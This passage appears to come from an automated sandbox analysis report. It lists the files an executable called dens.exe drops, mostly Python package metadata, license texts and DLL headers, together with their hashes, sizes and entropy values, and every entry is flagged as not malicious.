                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1130
                                                                                                                                                                                                                                            Entropy (8bit):5.118590213496374
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:qt4rWHvH0yPP3Gt6Hw1hP9QHmsUv48OV/+dho3BoqxFB:/S/lPvKhlQHms5QK3WmFB
                                                                                                                                                                                                                                            MD5:F0E423EEA5C91E7AA21BDB70184B3E53
                                                                                                                                                                                                                                            SHA1:A51CCDCB7A9D8C2116D1DFC16F11B3C8A5830F67
                                                                                                                                                                                                                                            SHA-256:6163F7987DFB38D6BC320CE2B70B2F02B862BC41126516D552EF1CD43247E758
                                                                                                                                                                                                                                            SHA-512:8BE742880E6E8495C7EC4C9ECC8F076A9FC9D64FC84B3AEBBC8D2D10DC62AC2C5053F33B716212DCB76C886A9C51619F262C460FC4B39A335CE1AE2C9A8769A8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:This is the MIT license: http://www.opensource.org/licenses/mit-license.php..Copyright (c) Alex Gr.nholm..Permission is hereby granted, free of charge, to any person obtaining a copy of this.software and associated documentation files (the "Software"), to deal in the Software.without restriction, including without limitation the rights to use, copy, modify, merge,.publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons.to whom the Software is furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all copies or.substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,.INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR.PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE.FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF C
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3717
                                                                                                                                                                                                                                            Entropy (8bit):4.986068381037722
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:DSQRbraktjaAckH94jQnJIK04Fak/grjspC3EklAJj:/Rakd4jA7ak/gvspNWmj
                                                                                                                                                                                                                                            MD5:B6DAAC02F66AC8403E9061881322BABE
                                                                                                                                                                                                                                            SHA1:9A94672CCFEA06156A5F8A321CD0626CFD233AE8
                                                                                                                                                                                                                                            SHA-256:CF675C1C0A744F08580855390DE87CC77D676B312582E8D4CFDB5BB8FD298D21
                                                                                                                                                                                                                                            SHA-512:9C6B7326C90396AA9E962C2731A1085EDB672B5696F95F552D13350843C09A246E0BBF0EC484862DFF434FA5A86DE4C0B7C963958ADE35A066B9D2384076DD47
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.1.Name: typeguard.Version: 4.3.0.Summary: Run-time type checker for Python.Author-email: Alex Gr.nholm <alex.gronholm@nextday.fi>.License: MIT.Project-URL: Documentation, https://typeguard.readthedocs.io/en/latest/.Project-URL: Change log, https://typeguard.readthedocs.io/en/latest/versionhistory.html.Project-URL: Source code, https://github.com/agronholm/typeguard.Project-URL: Issue tracker, https://github.com/agronholm/typeguard/issues.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Requires-Python: >=3.8.Description-Content
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2402
                                                                                                                                                                                                                                            Entropy (8bit):5.729208478282605
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:eDnuX3DVED9HDDeDfPDLkAosGDlDiVoBFj7XH0H3HuwVB6Kgfkx7J/Q1NK1cQyxk:eyX3WRHDiLPjksV7I47J/Q1U6Qyx5fsJ
                                                                                                                                                                                                                                            MD5:D680B2881597974ACD91750E5AB61010
                                                                                                                                                                                                                                            SHA1:E00ED2416B5CE21641E3946905504D62D536972F
                                                                                                                                                                                                                                            SHA-256:48A51959582478352275428CEECD78EF77D79AC9DAE796E39A2EAF2540282552
                                                                                                                                                                                                                                            SHA-512:112172ACB515B0712AC58D78898EB159580ADA3DD3F16AABB37CB7A8D964F9E4BADF2869A245927B83B208D56904831C0F04ED925C95DFCB705801734FB0C7BA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:typeguard-4.3.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..typeguard-4.3.0.dist-info/LICENSE,sha256=YWP3mH37ONa8MgzitwsvArhivEESZRbVUu8c1DJH51g,1130..typeguard-4.3.0.dist-info/METADATA,sha256=z2dcHAp0TwhYCFU5Deh8x31nazElgujUz9tbuP0pjSE,3717..typeguard-4.3.0.dist-info/RECORD,,..typeguard-4.3.0.dist-info/WHEEL,sha256=GJ7t_kWBFywbagK5eo9IoUwLW6oyOeTKmQ-9iHFVNxQ,92..typeguard-4.3.0.dist-info/entry_points.txt,sha256=qp7NQ1aLtiSgMQqo6gWlfGpy0IIXzoMJmeQTLpzqFZQ,48..typeguard-4.3.0.dist-info/top_level.txt,sha256=4z28AhuDodwRS_c1J_l8H51t5QuwfTseskYzlxp6grs,10..typeguard/__init__.py,sha256=Onh4w38elPCjtlcU3JY9k3h70NjsxXIkAflmQn-Z0FY,2071..typeguard/__pycache__/__init__.cpython-312.pyc,,..typeguard/__pycache__/_checkers.cpython-312.pyc,,..typeguard/__pycache__/_config.cpython-312.pyc,,..typeguard/__pycache__/_decorators.cpython-312.pyc,,..typeguard/__pycache__/_exceptions.cpython-312.pyc,,..typeguard/__pycache__/_functions.cpython-312.pyc,,..typeguard/__pycache__/_i
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):92
                                                                                                                                                                                                                                            Entropy (8bit):4.812622295095324
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeX7MWcSlVlFxP+tPCCfA5S:RtBMwlVTxWBBf
                                                                                                                                                                                                                                            MD5:43136DDE7DD276932F6197BB6D676EF4
                                                                                                                                                                                                                                            SHA1:6B13C105452C519EA0B65AC1A975BD5E19C50122
                                                                                                                                                                                                                                            SHA-256:189EEDFE4581172C1B6A02B97A8F48A14C0B5BAA3239E4CA990FBD8871553714
                                                                                                                                                                                                                                            SHA-512:E7712BA7D36DEB083EBCC3B641AD3E7D19FB071EE64AE3A35AD6A50EE882B20CD2E60CA1319199DF12584FE311A6266EC74F96A3FB67E59F90C7B5909668AEE1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.43.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):48
                                                                                                                                                                                                                                            Entropy (8bit):4.155187698990101
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:mWSJCQEjMitjHfLvn:mrMJHfbn
                                                                                                                                                                                                                                            MD5:AEAB5BCF8BF89A51C97C4CDF70578848
                                                                                                                                                                                                                                            SHA1:2E9C1617560AB66431AAB90700DB901985293485
                                                                                                                                                                                                                                            SHA-256:AA9ECD43568BB624A0310AA8EA05A57C6A72D08217CE830999E4132E9CEA1594
                                                                                                                                                                                                                                            SHA-512:2BE73E99296DF26A28835F91DD8BC50EB104AF06A3C54666175FAF322E0AD4620453DB0388531C4113B052A92C1D2E4C3088E25AF43CDE42AA852CF7B0CB5B05
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:[pytest11].typeguard = typeguard._pytest_plugin.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):10
                                                                                                                                                                                                                                            Entropy (8bit):3.321928094887362
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:LEJn:M
                                                                                                                                                                                                                                            MD5:004A2A8CE1AB120A63902A27D76BD964
                                                                                                                                                                                                                                            SHA1:A4E367AB40410598DADD1FC5F680ED7A176BEB09
                                                                                                                                                                                                                                            SHA-256:E33DBC021B83A1DC114BF73527F97C1F9D6DE50BB07D3B1EB24633971A7A82BB
                                                                                                                                                                                                                                            SHA-512:0D8FF9A43897AB390AB41AFE5BAC8BD38A68C2BEF88E844E5B49BF70E3164B226975CC2717AE3DC3428D1CFBB0BE068C243F104915FEE1FFA58C23FBE76FDB89
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:typeguard.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1016584
                                                                                                                                                                                                                                            Entropy (8bit):6.669319438805479
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24576:VkmZDEMHhp9v1Ikbn3ND0TNVOsIut8P4zmxvSZX0yplkA:mmZFHhp9v1Io3h0TN3pvkA
                                                                                                                                                                                                                                            MD5:0E0BAC3D1DCC1833EAE4E3E4CF83C4EF
                                                                                                                                                                                                                                            SHA1:4189F4459C54E69C6D3155A82524BDA7549A75A6
                                                                                                                                                                                                                                            SHA-256:8A91052EF261B5FBF3223AE9CE789AF73DFE1E9B0BA5BDBC4D564870A24F2BAE
                                                                                                                                                                                                                                            SHA-512:A45946E3971816F66DD7EA3788AACC384A9E95011500B458212DC104741315B85659E0D56A41570731D338BDF182141C093D3CED222C007038583CEB808E26FD
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........W..l9F.l9F.l9F...F.l9F.l8F.l9F...F.l9F..9G.l9F..:G.l9F..<G.l9F..7G.n9F..=G.l9F...F.l9F..;G.l9FRich.l9F........PE..d.....}X.........." .........`............................................................`A................................................p......................F...=......p...PX..T............................'...............O...............................text............................... ..`.rdata..<u.......v..................@..@.data....$...........r..............@....pdata.............................@..@.rsrc................4..............@..@.reloc..p............:..............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1138456
                                                                                                                                                                                                                                            Entropy (8bit):5.4620027688967845
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12288:arEHdcM6hbuCjJ43w9hIpCQvb0QN8MdIEQ+U2BNNmD+99FfcAIU:arEXDCjfk7bPNfv42BN6yzUAIU
                                                                                                                                                                                                                                            MD5:A8ED52A66731E78B89D3C6C6889C485D
                                                                                                                                                                                                                                            SHA1:781E5275695ACE4A5C3AD4F2874B5E375B521638
                                                                                                                                                                                                                                            SHA-256:BF669344D1B1C607D10304BE47D2A2FB572E043109181E2C5C1038485AF0C3D7
                                                                                                                                                                                                                                            SHA-512:1C131911F120A4287EBF596C52DE047309E3BE6D99BC18555BD309A27E057CC895A018376AA134DF1DC13569F47C97C1A6E8872ACEDFA06930BBF2B175AF9017
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#.}.#.}.#.}.*..%.}..*|.!.}..*~. .}..*y.+.}..*x...}.6-|. .}.h.|.!.}.#.|.s.}.6-p.".}.6-}.".}.6-..".}.6-..".}.Rich#.}.........PE..d...`b.f.........." ...(.@..........0*.......................................p.......)....`.........................................p...X............P.......@.......0.../...`......P^..T............................]..@............P..p............................text...!>.......@.................. ..`.rdata..\....P.......D..............@..@.data........ ......................@....pdata.......@......................@..@.rsrc........P.......$..............@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1107
                                                                                                                                                                                                                                            Entropy (8bit):5.115074330424529
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:PWmrRONJHLH0cPP3gtkHw1h39QHOsUv4eOk4/+jvho3nPz:ttONJbbvE/NQHOs5eNS3n7
                                                                                                                                                                                                                                            MD5:7FFB0DB04527CFE380E4F2726BD05EBF
                                                                                                                                                                                                                                            SHA1:5B39C45A91A556E5F1599604F1799E4027FA0E60
                                                                                                                                                                                                                                            SHA-256:30C23618679108F3E8EA1D2A658C7CA417BDFC891C98EF1A89FA4FF0C9828654
                                                                                                                                                                                                                                            SHA-512:205F284F3A7E8E696C70ED7B856EE98C1671C68893F0952EEC40915A383BC452B99899BDC401F9FE161A1BF9B6E2CEA3BCD90615EEE9173301657A2CE4BAFE14
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MIT License..Copyright (c) 2012 Daniel Holth <dholth@fastmail.fm> and contributors..Permission is hereby granted, free of charge, to any person obtaining a.copy of this software and associated documentation files (the "Software"),.to deal in the Software without restriction, including without limitation.the rights to use, copy, modify, merge, publish, distribute, sublicense,.and/or sell copies of the Software, and to permit persons to whom the.Software is furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included.in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL.THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR.OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERW
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2153
                                                                                                                                                                                                                                            Entropy (8bit):5.088249746074878
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:DEhpFu5MktjaywDK48d+md+7uT8RfkD1UKd+mOl1Awry:DEhpiMktjayq/7kOfsUzmbYy
                                                                                                                                                                                                                                            MD5:EBEA27DA14E3F453119DC72D84343E8C
                                                                                                                                                                                                                                            SHA1:7CEB6DBE498B69ABF4087637C6F500742FF7E2B4
                                                                                                                                                                                                                                            SHA-256:59BAC22B00A59D3E5608A56B8CF8EFC43831A36B72792EE4389C9CD4669C7841
                                                                                                                                                                                                                                            SHA-512:A41593939B9325D40CB67FD3F41CD1C9E9978F162487FB469094C41440B5F48016B9A66BE2E6E4A0406D6EEDB25CE4F5A860BA1E3DC924B81F63CEEE3AE31117
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.1.Name: wheel.Version: 0.43.0.Summary: A built-package format for Python.Keywords: wheel,packaging.Author-email: Daniel Holth <dholth@fastmail.fm>.Maintainer-email: Alex Gr.nholm <alex.gronholm@nextday.fi>.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: Topic :: System :: Archiving :: Packaging.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Requires-Dist: pytest >= 6.0.0 ; extra == "test".Requires-Dist: setuptools >= 65 ; extra == "test".Project-URL: Changelog, https://wheel.readthedocs.io/en/s
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4557
                                                                                                                                                                                                                                            Entropy (8bit):5.714200636114494
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:QXVuEmegx01TQIvFCiq9H/H7vp88FxTXiJPkGJP4CWweXQHmnDpMI78IegK5EeZR:QXVxAbYkU4CWweXQHmnDpMeV2BvTRqQF
                                                                                                                                                                                                                                            MD5:44D352C4997560C7BFB82D9360F5985A
                                                                                                                                                                                                                                            SHA1:BE58C7B8AB32790384E4E4F20865C4A88414B67A
                                                                                                                                                                                                                                            SHA-256:783E654742611AF88CD9F00BF01A431A219DB536556E63FF981C7BD673070AC9
                                                                                                                                                                                                                                            SHA-512:281B1D939A560E6A08D0606E5E8CE15F086B4B45738AB41ED6B5821968DC8D764CD6B25DB6BA562A07018C271ABF17A6BC5A380FAD05696ADF1D11EE2C5749C8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:../../bin/wheel,sha256=cT2EHbrv-J-UyUXu26cDY-0I7RgcruysJeHFanT1Xfo,249..wheel-0.43.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..wheel-0.43.0.dist-info/LICENSE.txt,sha256=MMI2GGeRCPPo6h0qZYx8pBe9_IkcmO8aifpP8MmChlQ,1107..wheel-0.43.0.dist-info/METADATA,sha256=WbrCKwClnT5WCKVrjPjvxDgxo2tyeS7kOJyc1GaceEE,2153..wheel-0.43.0.dist-info/RECORD,,..wheel-0.43.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..wheel-0.43.0.dist-info/WHEEL,sha256=EZbGkh7Ie4PoZfRQ8I0ZuP9VklN_TvcZ6DSE5Uar4z4,81..wheel-0.43.0.dist-info/entry_points.txt,sha256=rTY1BbkPHhkGMm4Q3F0pIzJBzW2kMxoG1oriffvGdA0,104..wheel/__init__.py,sha256=D6jhH00eMzbgrXGAeOwVfD5i-lCAMMycuG1L0useDlo,59..wheel/__main__.py,sha256=NkMUnuTCGcOkgY0IBLgBCVC_BGGcWORx2K8jYGS12UE,455..wheel/__pycache__/__init__.cpython-312.pyc,,..wheel/__pycache__/__main__.cpython-312.pyc,,..wheel/__pycache__/_setuptools_logging.cpython-312.pyc,,..wheel/__pycache__/bdist_wheel.cpython-312.pyc,,..wheel/__pycache
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):81
                                                                                                                                                                                                                                            Entropy (8bit):4.672346887071811
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeX/QFM+vxP+tPCCfA5I:Rt1Qq2WBB3
                                                                                                                                                                                                                                            MD5:24019423EA7C0C2DF41C8272A3791E7B
                                                                                                                                                                                                                                            SHA1:AAE9ECFB44813B68CA525BA7FA0D988615399C86
                                                                                                                                                                                                                                            SHA-256:1196C6921EC87B83E865F450F08D19B8FF5592537F4EF719E83484E546ABE33E
                                                                                                                                                                                                                                            SHA-512:09AB8E4DAA9193CFDEE6CF98CCAE9DB0601F3DCD4944D07BF3AE6FA5BCB9DC0DCAFD369DE9A650A38D1B46C758DB0721EBA884446A8A5AD82BB745FD5DB5F9B1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: flit 3.9.0.Root-Is-Purelib: true.Tag: py3-none-any.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):104
                                                                                                                                                                                                                                            Entropy (8bit):4.271713330022269
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:1SSAnAYgh+MWTMhk6WjrAM5t5ln:1Jb9WTMhk9jUM5t5ln
                                                                                                                                                                                                                                            MD5:6180E17C30BAE5B30DB371793FCE0085
                                                                                                                                                                                                                                            SHA1:E3A12C421562A77D90A13D8539A3A0F4D3228359
                                                                                                                                                                                                                                            SHA-256:AD363505B90F1E1906326E10DC5D29233241CD6DA4331A06D68AE27DFBC6740D
                                                                                                                                                                                                                                            SHA-512:69EAE7B1E181D7BA1D3E2864D31E1320625A375E76D3B2FBF8856B3B6515936ACE3138D4D442CABDE7576FCFBCBB0DEED054D90B95CFA1C99829DB12A9031E26
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:[console_scripts].wheel=wheel.cli:main..[distutils.commands].bdist_wheel=wheel.bdist_wheel:bdist_wheel..
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):55808
                                                                                                                                                                                                                                            Entropy (8bit):5.781337979621736
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:WknJ07sWZTpdvhPoxU66zWc/lzLehKhdtShQQvCQLxZpiSMcVVLh:WV48bvhPoxU7Nlve8tSJ+SMM
                                                                                                                                                                                                                                            MD5:863A566F7C2A76B8A23AC30E04C0DACF
                                                                                                                                                                                                                                            SHA1:DF75C0D04810F3027A5E182EAD3EFBAF7616C07C
                                                                                                                                                                                                                                            SHA-256:DE569177BEC7668C01A82B8BE7F56DD25F13FE296432715B1035B57153453BBC
                                                                                                                                                                                                                                            SHA-512:D9135CA93A56642AD80B4F04C1EE1647207CF9CDC19943696D7A710F1CA680435A931F22829078A0C85766DBAE2E9E3C768A7C681D92FCA8D65CF32D53558152
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^..D..............?.............Q...............................................R.......R.......R.S.....R.......Rich............PE..d....X.f.........." ...).....X......0........................................0............`.........................................@...d.......d............................ ..........................................@............................................text............................... ..`.rdata...9.......:..................@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):97792
                                                                                                                                                                                                                                            Entropy (8bit):5.988158419392648
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:cfnVt5r+NtMILQN+Hfrxn9hXdV4SKKSODPXj7AZeN8mGEqCMy:sVtkfMuosfR9h/4SRSODPXH8pE
                                                                                                                                                                                                                                            MD5:35FA0191828509C2BB02684F36DDC796
                                                                                                                                                                                                                                            SHA1:68FAF30484482E465106C449ABEAFA5741F16541
                                                                                                                                                                                                                                            SHA-256:19D8E8F4293B3ABACB4DB9E68CF402B9A24A260FAAC7DF7EC373D7DDC6DD7EC4
                                                                                                                                                                                                                                            SHA-512:E468F4FB5B8428ADD59DBAAFCEE5F536C9F24771B9FB2B7754445AF2925EF286BBE283951CC1C1E2A5CE33BD311B51A8A7D44E06BE9E5663BE4D19FCACD51115
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........].....................%..............%.......%.......%.......%..........9....$.......$.......$i......$......Rich............PE..d....X.f.........." ...)..................................................................`.........................................`X..d....X..x...............................,....G...............................F..@............ ..x............................text...(........................... ..`.rdata...M... ...N..................@..@.data....6...p.......b..............@....pdata...............n..............@..@.rsrc................z..............@..@.reloc..,............|..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
